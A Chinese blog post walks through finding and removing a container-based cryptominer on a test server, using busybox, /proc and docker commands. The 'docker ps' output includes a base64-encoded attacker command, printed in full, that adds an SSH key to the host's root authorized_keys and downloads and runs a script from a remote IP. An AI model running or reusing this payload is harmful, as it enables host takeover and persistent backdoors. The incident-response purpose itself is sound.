<!doctype html>
<html lang="zh-CN">
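<head>
    <!-- Encoding, legacy-IE rendering mode and viewport; charset stays first so it is parsed before any text. -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!-- NOTE(review): this policy sends the full page URL as Referer to cross-origin HTTPS
         destinations. It is kept as-is because third-party widgets on the page may depend on it;
         confirm before tightening to strict-origin-when-cross-origin. -->
    <meta name="referrer" content="no-referrer-when-downgrade">

    <!-- Page identity plus Open Graph / article metadata. -->
    <title>挖矿病毒4-容器挖矿病毒清理 | Anttu&#39;s Blog</title>
    <meta property="og:title" content="挖矿病毒4-容器挖矿病毒清理 - Anttu&#39;s Blog">
    <meta property="og:type" content="article">
    <meta property="article:published_time" content="2022-01-26T00:29:47&#43;08:00">
    <meta property="article:modified_time" content="2022-01-26T00:29:47&#43;08:00">
    <meta name="Keywords" content="golang,go语言,go语言笔记,anttu,java,博客,bash,linux笔记,python笔记,公众号,小程序">
    <meta name="description" content="挖矿病毒4-容器挖矿病毒清理">
    <meta name="author" content="Anttu">
    <meta property="og:url" content="https://anttu.gitee.io/post/2022-01-26-miner_virus_4/">
    <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">

    <!-- First-party stylesheets. -->
    <link rel="stylesheet" href="/css/normalize.css">
    <link rel="stylesheet" href="/css/style.css">

    <!-- Third-party jQuery. The URL is pinned to https: instead of the protocol-relative form so the
         script can never be fetched over plain HTTP.
         NOTE(review): the file runs with full page privileges and is loaded without Subresource
         Integrity. Either self-host it or add integrity="sha384-<HASH_OF_THE_PINNED_FILE>" together
         with crossorigin="anonymous" once the hash has been computed from a trusted copy.
         jQuery 3.4.1 also predates the 3.5.0 release that hardened HTML parsing against XSS;
         consider upgrading. -->
    <script src="https://cdn.bootcdn.net/ajax/libs/jquery/3.4.1/jquery.min.js"></script>

    <link rel="stylesheet" href="/css/asciinema-player.css">
</head>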


<body>

    <div id="body">
        <div class="container">
            <div class="col-group">

                <div class="col-8" id="main">
                    
<div class="res-cons">
    <article class="post">
        <header>
            <h1 class="post-title">挖矿病毒4-容器挖矿病毒清理</h1>
        </header>
        <date class="post-meta meta-date">
            2022年1月26日
        </date>
        
        <div class="post-meta">
            <span>|</span>
            
            <span class="meta-category">
                <a href='/categories/mine' target="_blank">mine</a>
            </span>
            
            <span class="meta-category">
                <a href='/categories/virus' target="_blank">virus</a>
            </span>
            
            <span class="meta-category">
                <a href='/categories/linux' target="_blank">linux</a>
            </span>
            
            <span class="meta-category">
                <a href='/categories/check' target="_blank">check</a>
            </span>
            
            <span class="meta-category">
                <a href='/categories/docker' target="_blank">docker</a>
            </span>
            
        </div>
        
        
        
        <div class="post-content">
            <h2 id="前言">前言</h2>
<p>1月26日，运维同学收到告警邮件，告诉我某台测试服务器中了挖矿病毒，心想怎么最近挖矿这么猖狂&hellip;</p>
<h2 id="1分析准备">1、分析准备</h2>
<p>仍然是先下载 busybox：被入侵主机上自带的 top、ps 等命令可能已被篡改，用独立的静态编译 busybox 来排查更可靠。最好在可信机器上下载并核对校验值后再拷贝到被排查的主机上。</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>wget https://busybox.net/downloads/binaries/1.30.0-i686/busybox 
</span></span><span style="display:flex;"><span>chmod +x busybox
</span></span><span style="display:flex;"><span>cp busybox /usr/bin 
</span></span><span style="display:flex;"><span>busybox  top
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="2按步骤排查">2、按步骤排查</h2>
<p>剩余步骤跟<a href="/post/2021-01-28-miner_virus_2">挖矿病毒2-分析和排查思路</a>一样，只是所有命令都要通过 busybox 执行（busybox command）<br>
不过这次是容器挖矿，ECS 上的排查步骤仍然走了一遍，没什么收获，但恶意进程还是可以找到的</p>
<h2 id="3找到恶意进程">3、找到恶意进程</h2>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor ~<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># busybox top</span>
</span></span><span style="display:flex;"><span>top - 14:14:48 up <span style="color:#099">6</span> days, <span style="color:#099">10</span> min,  <span style="color:#099">1</span> user,  load average: 2.06, 2.32, 2.30
</span></span><span style="display:flex;"><span>Tasks: <span style="color:#099">171</span> total,   <span style="color:#099">1</span> running, <span style="color:#099">169</span> sleeping,   <span style="color:#099">0</span> stopped,   <span style="color:#099">1</span> zombie
</span></span><span style="display:flex;"><span>%Cpu<span style="color:#000;font-weight:bold">(</span>s<span style="color:#000;font-weight:bold">)</span>: 50.7 us,  0.7 sy,  0.0 ni, 48.7 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
</span></span><span style="display:flex;"><span>KiB Mem : <span style="color:#099">16266252</span> total, <span style="color:#099">10225056</span> free,  <span style="color:#099">5006372</span> used,  <span style="color:#099">1034824</span> buff/cache
</span></span><span style="display:flex;"><span>KiB Swap:        <span style="color:#099">0</span> total,        <span style="color:#099">0</span> free,        <span style="color:#099">0</span> used. <span style="color:#099">10917736</span> avail Mem 
</span></span><span style="display:flex;"><span>  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND                                                                                          
</span></span><span style="display:flex;"><span> <span style="color:#099">4116</span> root      <span style="color:#099">20</span>   <span style="color:#099">0</span> <span style="color:#099">2439464</span>   <span style="color:#099">3272</span>   <span style="color:#099">2132</span> S 200.3  0.0 750:29.39 .ddns
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="4找到程序目录">4、找到程序目录</h2>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor ~<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># cd /proc/4116</span>
</span></span><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor 4116<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># ls -alrt</span>
</span></span><span style="display:flex;"><span>total <span style="color:#099">0</span>
</span></span><span style="display:flex;"><span>dr-xr-xr-x <span style="color:#099">182</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">20</span> 14:04 ..
</span></span><span style="display:flex;"><span>-r--r--r--   <span style="color:#099">1</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">26</span> 07:58 status
</span></span><span style="display:flex;"><span>-r--r--r--   <span style="color:#099">1</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">26</span> 07:58 stat
</span></span><span style="display:flex;"><span>lrwxrwxrwx   <span style="color:#099">1</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">26</span> 07:58 cwd -&gt; /var/tmp/.crypto/...
</span></span><span style="display:flex;"><span>-r--r--r--   <span style="color:#099">1</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">26</span> 07:58 cgroup
</span></span><span style="display:flex;"><span>dr-xr-xr-x   <span style="color:#099">9</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">26</span> 07:58 .
</span></span><span style="display:flex;"><span>lrwxrwxrwx   <span style="color:#099">1</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">26</span> 07:58 exe -&gt; /var/tmp/.crypto/.../.ddns
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor admin<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># cd /proc/4115/</span>
</span></span><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor 4115<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># ls -alrt</span>
</span></span><span style="display:flex;"><span>total <span style="color:#099">0</span>
</span></span><span style="display:flex;"><span>dr-xr-xr-x <span style="color:#099">182</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">20</span> 14:04 ..
</span></span><span style="display:flex;"><span>lrwxrwxrwx   <span style="color:#099">1</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">26</span> 07:58 cwd -&gt; /var/tmp/.crypto/...
</span></span><span style="display:flex;"><span>dr-xr-xr-x   <span style="color:#099">9</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">26</span> 07:58 .
</span></span><span style="display:flex;"><span>-r--r--r--   <span style="color:#099">1</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">26</span> 07:58 status
</span></span><span style="display:flex;"><span>-r--r--r--   <span style="color:#099">1</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">26</span> 07:58 stat
</span></span><span style="display:flex;"><span>lrwxrwxrwx   <span style="color:#099">1</span> root root <span style="color:#099">0</span> Jan <span style="color:#099">26</span> 07:59 exe -&gt; /var/tmp/.crypto/.../httpd-crypto
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="5查看进程">5、查看进程</h2>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor ~<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># busybox lsof -i | grep ddns</span>
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      /var/tmp/.crypto/.../.pid
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      anon_inode:<span style="color:#000;font-weight:bold">[</span>eventpoll<span style="color:#000;font-weight:bold">]</span>
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      pipe:<span style="color:#000;font-weight:bold">[</span>15165876<span style="color:#000;font-weight:bold">]</span>
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      pipe:<span style="color:#000;font-weight:bold">[</span>15165876<span style="color:#000;font-weight:bold">]</span>
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      pipe:<span style="color:#000;font-weight:bold">[</span>15165877<span style="color:#000;font-weight:bold">]</span>
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      pipe:<span style="color:#000;font-weight:bold">[</span>15165877<span style="color:#000;font-weight:bold">]</span>
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      anon_inode:<span style="color:#000;font-weight:bold">[</span>eventfd<span style="color:#000;font-weight:bold">]</span>
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      /var/tmp/.crypto/.../.ddns.log
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      anon_inode:<span style="color:#000;font-weight:bold">[</span>eventfd<span style="color:#000;font-weight:bold">]</span>
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      anon_inode:inotify
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      anon_inode:<span style="color:#000;font-weight:bold">[</span>eventfd<span style="color:#000;font-weight:bold">]</span>
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      /dev/null
</span></span><span style="display:flex;"><span><span style="color:#099">4116</span>    /var/tmp/.crypto/.../.ddns      socket:<span style="color:#000;font-weight:bold">[</span>15167677<span style="color:#000;font-weight:bold">]</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="6查找程序本体">6、查找程序本体</h2>
<p>发现程序本体并不在 ECS 上，试了下主机上有 docker 命令，就查看下 docker 容器清单（docker ps -a 列出的是容器，包括已退出的）</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor ~<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># docker ps -a</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>CONTAINER ID        IMAGE                                                                 COMMAND                  CREATED             STATUS                       PORTS                                         NAMES
</span></span><span style="display:flex;"><span>fd3a4ea7e1d9        ubuntu                                                                <span style="color:#d14">&#34;/bin/bash /var/tmp/./crypto/.../httpd-crypto&#34;</span>   <span style="color:#099">11</span> hours ago        Exited <span style="color:#000;font-weight:bold">(</span>1<span style="color:#000;font-weight:bold">)</span> <span style="color:#099">11</span> hours ago                                                    
</span></span></code></pre></td></tr></table>
</div>
</div><p>如果 COMMAND 列显示不完整，可以加 --no-trunc 查看完整命令。完整命令里的 base64 内容就是攻击者实际执行的脚本，分析时只解码查看，不要在主机上执行</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#998;font-style:italic">#  查看完整的command</span>
</span></span><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor ~<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># docker ps --no-trunc -a</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>CONTAINER ID                                                       IMAGE                                                                     COMMAND                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 CREATED             STATUS                       PORTS                                         NAMES
</span></span><span style="display:flex;"><span>d4b3ae6385319554d7cff96aa3259fded0e7a63cdaa61d04d0cb7dbf331dabb7   alpine                                                                    <span style="color:#d14">&#34;chroot /host bash -c &#39;echo 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 | base64 -d | bash&#39;&#34;</span>   <span style="color:#099">2</span> days ago          Exited <span style="color:#000;font-weight:bold">(</span>1<span style="color:#000;font-weight:bold">)</span> <span style="color:#099">2</span> days ago                                                      eloquent_noyce
</span></span><span style="display:flex;"><span>902e4c85e42399df5a15d745f8da91bfaa520cf77754cbbe4bda194fb93ec212   alpineos/dockerapi                                                        <span style="color:#d14">&#34;/pause&#34;</span>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                <span style="color:#099">2</span> days ago          Up <span style="color:#099">2</span> days                                                                  intelligent_taussig
</span></span><span style="display:flex;"><span>b5d5a2638c3735cb18b4df540dd85ab17805f2086d4374c432ed7f9182f77c21   alpine                                                                    <span style="color:#d14">&#34;chroot /host bash -c &#39;echo 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 | base64 -d | bash&#39;&#34;</span>   <span style="color:#099">4</span> days ago          Exited <span style="color:#000;font-weight:bold">(</span>1<span style="color:#000;font-weight:bold">)</span> <span style="color:#099">4</span> days ago                                                      flamboyant_liskov
</span></span><span style="display:flex;"><span>55f6154c77cf0239c0df0f15bdbe1a4b67db71f5a61f6ed55ca543af40a429d7   alpineos/dockerapi                                                        <span style="color:#d14">&#34;/pause&#34;</span>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                <span style="color:#099">4</span> days ago          Up <span style="color:#099">4</span> days                                                                  clever_sammet
</span></span><span style="display:flex;"><span>fd3a4ea7e1d9eba40b2a1bb887fc85c798894b23b27f5cc306130cc22c6cf6db   alpine                                                                    <span style="color:#d14">&#34;chroot /host bash -c &#39;echo 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  | base64 -d | bash&#39;&#34;</span>                                          <span style="color:#099">2</span> weeks ago         Exited <span style="color:#000;font-weight:bold">(</span>1<span style="color:#000;font-weight:bold">)</span> <span style="color:#099">2</span> weeks ago                                                     vigilant_lamport
</span></span><span style="display:flex;"><span>2079058fc554083300ef6277d1942404bf1318ec057d63a7af81504564e9f5d3   alpine                                                                    <span style="color:#d14">&#34;chroot /host bash -c &#39;echo c3NoLWtleWdlbiAtTiAiIiAtZiAvdG1wL1RlYW1UTlQKbWtkaXIgLXAgL3Jvb3QvLnNzaApjaGF0dHIgLVIgLWlhIC9yb290Ly5zc2gvIDI+L2Rldi9udWxsOyB0bnRyZWNodCAtUiAtaWEgL3Jvb3QvLnNzaC8gMj4vZGV2L251bGw7IGljaGRhcmYgLVIgLWlhIC9yb290Ly5zc2gvIDI+L2Rldi9udWxsCmNhdCAvdG1wL1RlYW1UTlQucHViID4+IC9yb290Ly5zc2gvYXV0aG9yaXplZF9rZXlzCmNhdCAvdG1wL1RlYW1UTlQucHViID4gL3Jvb3QvLnNzaC9hdXRob3JpemVkX2tleXMyCnJtIC1mIC90bXAvVGVhbVROVC5wdWIKCgpzc2ggLW9TdHJpY3RIb3N0S2V5Q2hlY2tpbmc9bm8gLW9CYXRjaE1vZGU9eWVzIC1vQ29ubmVjdFRpbWVvdXQ9NSAtaSAvdG1wL1RlYW1UTlQgcm9vdEAxMjcuMC4wLjEgIihjdXJsIGh0dHA6Ly8xMDQuMTkyLjgyLjEzOC9zM2YxMDE1L2IvYS5zaHx8Y2QxIGh0dHA6Ly8xMDQuMTkyLjgyLjEzOC9zM2YxMDE1L2IvYS5zaHx8d2dldCAtcSAtTy0gaHR0cDovLzEwNC4xOTIuODIuMTM4L3MzZjEwMTUvYi9hLnNofHx3ZDEgLXEgLU8tIGh0dHA6Ly8xMDQuMTkyLjgyLjEzOC9zM2YxMDE1L2IvYS5zaCl8YmFzaCIKCnJtIC1mIC90bXAvVGVhbVROVA==  | base64 -d | bash&#39;&#34;</span>                                          <span style="color:#099">4</span> weeks ago         Exited <span style="color:#000;font-weight:bold">(</span>1<span style="color:#000;font-weight:bold">)</span> <span style="color:#099">4</span> weeks ago                                                     funny_swirles
</span></span><span style="display:flex;"><span>b541f979ea7d8ff2ea4f0d2690ce02135174d6ee4995a80d1836d480aecc7c4b   alpine                                                                    <span style="color:#d14">&#34;chroot /host bash -c &#39;echo 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  | base64 -d | bash&#39;&#34;</span>                                          <span style="color:#099">7</span> weeks ago         Exited <span style="color:#000;font-weight:bold">(</span>1<span style="color:#000;font-weight:bold">)</span> <span style="color:#099">7</span> weeks ago                                                     kind_leakey
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="注意">注意：</h4>
<p>一般根据完整的 command 可以看到挖矿病毒执行的脚本或者命令。如果命令里是 base64 编码的内容，可以把字符串单独用 <code>base64 -d</code> 解码后阅读，不要像原命令那样再通过管道交给 bash 执行。</p>
<h2 id="7查看镜像">7、查看镜像</h2>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor ~<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># docker images | grep alpine</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="注意-1">注意：</h4>
<p>一般情况下，挖矿容器的创建时间与该镜像添加的时间比较接近，使用的镜像类型也是一样的</p>
<h2 id="8停容器">8、停容器</h2>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor ~<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># docker stop c083afcd779c</span>
</span></span><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor ~<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># docker stop d241358140a8</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="注意-2">注意：</h4>
<p>要同时找到守护进程和主体进程对应的容器，全部清理干净。删除之前可以先用 <code>docker inspect</code> 把容器的创建时间、挂载目录和启动命令保存下来，便于后续排查入侵途径。</p>
<h2 id="9删容器">9、删容器</h2>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor ~<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># docker rm c083afcd779c</span>
</span></span><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor ~<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># docker rm d241358140a8</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="10删镜像">10、删镜像</h2>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor ~<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># docker rmi b39e0b392b7e</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="11入侵原因">11、入侵原因</h2>
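<p>容器的入侵途径没有 ECS 那么方便定位，等后续学会了再补充……<br>
不过清理容器挖矿比 ECS 还方便。查看了下 ECS 日志，只能在 messages 里看到部分日志，其他地方找不到蛛丝马迹了<br>
不过可以把测试服务器上的开源软件版本搜集一下，到 CVE 库里查查是否有漏洞，如果有漏洞的话可以升级到安全版本<br>
另外要注意：上面容器列表里的命令都是先 <code>chroot /host</code> 再执行的，也就是直接作用在宿主机上；把其中完整保留的那段 base64 解码后可以看到，它会往宿主机的 <code>/root/.ssh/authorized_keys</code> 和 <code>authorized_keys2</code> 写入公钥，并以 root 身份在宿主机上下载并执行脚本。所以只删容器和镜像是不够的，还要检查宿主机上的这两个文件，以及该脚本可能留下的其他持久化项；这类看起来挂载了宿主机根目录的 alpine 容器，也提示应确认 Docker 的远程 API 是否在没有认证的情况下对外开放（需结合实际环境确认）。</p>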
<h2 id="12参考">12、参考</h2>
<p>docker挖矿：<a href="https://blog.csdn.net/dot_life/article/details/105480202">https://blog.csdn.net/dot_life/article/details/105480202</a></p>

        </div>

        
<div class="post-archive">
    <ul class="post-copyright">
        <li><strong>原文作者：</strong><a rel="author" href="https://anttu.gitee.io/">Anttu</a></li>
        <li style="word-break:break-all"><strong>原文链接：</strong><a href="https://anttu.gitee.io/post/2022-01-26-miner_virus_4/">https://anttu.gitee.io/post/2022-01-26-miner_virus_4/</a></li>
        <li><strong>版权声明：</strong>本作品采用<a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/">知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议</a>进行许可，非商业转载请注明出处（作者，原文链接），商业转载请联系作者获得授权。</li>
    </ul>
</div>
<br/>



        

<div class="post-archive">
    <h2>See Also</h2>
    <ul class="listing">
        
        <li><a href="/post/2022-01-24-miner_virus_3/">挖矿病毒3-分析和清理过程</a></li>
        
        <li><a href="/post/2022-01-07-regexp/">一些正则小细节-不定期补充</a></li>
        
        <li><a href="/post/2022-01-06-sdkman/">sdkman的使用</a></li>
        
        <li><a href="/post/2021-12-23-mysql_table_clean/">mysql大表的数据清理</a></li>
        
        <li><a href="/post/2021-12-17-nmap/">nmap参数详解</a></li>
        
    </ul>
</div>


        <div class="post-meta meta-tags">
            
            没有标签
            
        </div>
    </article>
    
    

    
    
    <div class="post bg-white">
      <script src="https://utteranc.es/client.js"
            repo= "anTtutu/anTtutu.github.io"
            issue-term="pathname"
            theme="github-light"
            crossorigin="anonymous"
            async>
      </script>
    </div>
    
    
    
</div>

                    <footer id="footer">
    <div>
        &copy; 2025 <a href="https://anttu.gitee.io/">Anttu&#39;s Blog By Anttu</a>
        
    </div>
    <br />
    <div>
        <div class="github-badge">
            <a href="https://gohugo.io/" target="_black" rel="nofollow"><span class="badge-subject">Powered by</span><span class="badge-value bg-blue">Hugo</span></a>
        </div>
        
        <div class="github-badge">
            <a href="https://github.com/flysnow-org/maupassant-hugo" target="_black"><span class="badge-subject">Theme</span><span class="badge-value bg-yellowgreen">Maupassant</span></a>
        </div>
    </div>
</footer>


    
    
    <script type="text/javascript">
        window.MathJax = {
            tex2jax: {
                inlineMath: [['$', '$']],
                processEscapes: true
                }
            };
    </script>
    <script src='//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML' async></script>

<a id="rocket" href="#top"></a>
<script type="text/javascript" src='/js/totop.js?v=0.0.0' async=""></script>
<style type="text/css">
div.highlight {
    position: relative;
    margin: 1em 0px;
}

.copy-code {
    display: none;
    position: absolute;
    top: 4px;
    right: 4px;
    color: rgba(255, 255, 255, 0.8);
    background: rgba(78, 78, 78, 0.8);
    border-radius: var(--radius);
    padding: 0 5px;
    font: inherit;
    user-select: none;
    cursor: pointer;
    border: 0;
    --radius: 8px;
}

div.highlight:hover .copy-code,pre:hover .copy-code {
    display: block;
}

</style>
<script>
    document.querySelectorAll('pre > code').forEach((codeblock) => {
        const container = codeblock.parentNode.parentNode;

        const copybutton = document.createElement('button');
        copybutton.classList.add('copy-code');
        copybutton.innerHTML = 'copy';

        function copyingDone() {
            copybutton.innerHTML = 'copied!';
            setTimeout(() => {
                copybutton.innerHTML = 'copy';
            }, 2000);
        }

        copybutton.addEventListener('click', (cb) => {
            if ('clipboard' in navigator) {
                navigator.clipboard.writeText(codeblock.textContent);
                copyingDone();
                return;
            }

            const range = document.createRange();
            range.selectNodeContents(codeblock);
            const selection = window.getSelection();
            selection.removeAllRanges();
            selection.addRange(range);
            try {
                document.execCommand('copy');
                copyingDone();
            } catch (e) { };
            selection.removeRange(range);
        });

        if (container.classList.contains("highlight")) {
            container.appendChild(copybutton);
        } else if (container.parentNode.firstChild == container) {
            
        } else if (codeblock.parentNode.parentNode.parentNode.parentNode.parentNode.nodeName == "TABLE") {
            
            codeblock.parentNode.parentNode.parentNode.parentNode.parentNode.appendChild(copybutton);
